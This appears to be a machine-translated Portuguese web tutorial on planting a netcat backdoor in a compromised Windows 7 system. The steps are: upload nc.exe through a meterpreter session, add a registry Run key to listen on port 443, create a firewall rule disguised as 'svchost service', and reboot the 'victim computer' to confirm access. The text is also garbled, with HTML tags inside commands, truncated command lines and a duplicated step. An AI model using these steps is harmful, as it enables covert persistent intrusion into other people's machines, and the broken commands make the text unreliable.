NOTÍCIAS

[ANONYMOUS][grids]

Como usar o netcat como um backdoor no sistema Windows



Neste artigo, vamos usar o netcat para usar como backdoor, particularmente no sistema Windows.


Se um hacker quebrar seu sistema, uma vez que ele crie um backdoor apenas para voltar novamente isso é conseguido através do netcat.

 usar o NetCat como Backdoor no Windows 7 System:

O primeiro passo que você precisa para ganhar um acesso a vítima computador e obter um meterpreter roteiro para a carga útil.
O primeiro passo que você precisa para ganhar um acesso a vítima computador e obter um meterpreter roteiro para a carga útil.
Java_signed_applet7
O próximo passo que você precisa para carregar o seu Netcat.exe a vítima computador usando seguinte comando:
Upload / pentest / < strong class = "StrictlyAutoTagBold" > windows < / strong> -binaries / tools / nc . Exe C : \\ < strong class = "StrictlyAutoTagBold" > windows < / strong> \\ system32

carregar nc.exe e colocá-lo em C: \ <strong class = "StrictlyAutoTagBold"> Windows </ strong > \ system32 na vítima < strong class = "StrictlyAutoTagBold" > computador </ strong >
A próxima etapa, precisamos configurar o registro para que o NetCat seja executado no Windows iniciando e ouvindo na porta 443. Fazemos isso editando a chave " HKLM \ software \ microsoft \ windows \ currentversion \ run ". Enumere a chave de registro fornecida:
Reg enumkey - k < strong class = "StrictlyAutoTagBold" > HKLM < / strong> \\ <strong class = "Strictl
Até este passo, tudo está bem, para o próximo passo, precisamos alterar o sistema para permitir conexões remotas através do firewall para o nosso backdoor netcat usando o comando netsh e abrir a porta 443. Execute o comando shell do meterpreter para acessar o prompt de comando e execute:
Netsh advfirewall firewall adicionar nome da regra = "serviço svchost" dir = em ação = permitir protoco
9. Yep tudo foi criado tão grande até esta etapa, agora vamos executar o nosso netcat para tentar conectar a vítima computador executando:
nc - porta victim_ip_address v
Vamos tentar o nosso backdoor reiniciando a vítima computador usando reinicialização comando meterpreter ou desligamento -r -t 00 de janelas console e tente novamente para conectar usando NetCat na etapa 9.
< Strong class = "StrictlyAutoTagBold" > meterpreter </ strong> & gt; Reiniciar 

ou

C: \ < classe forte = "StrictlyAutoTagBold" > janelas </ strong> \ system32 & gt; <strong class = "StrictlyAutoTagBold" > desligamento </ strong> -r -t 00  
Se a nossa netcat mostrar um console, então estamos bem sucedida injetar um NetCat backdoor a vítima computador .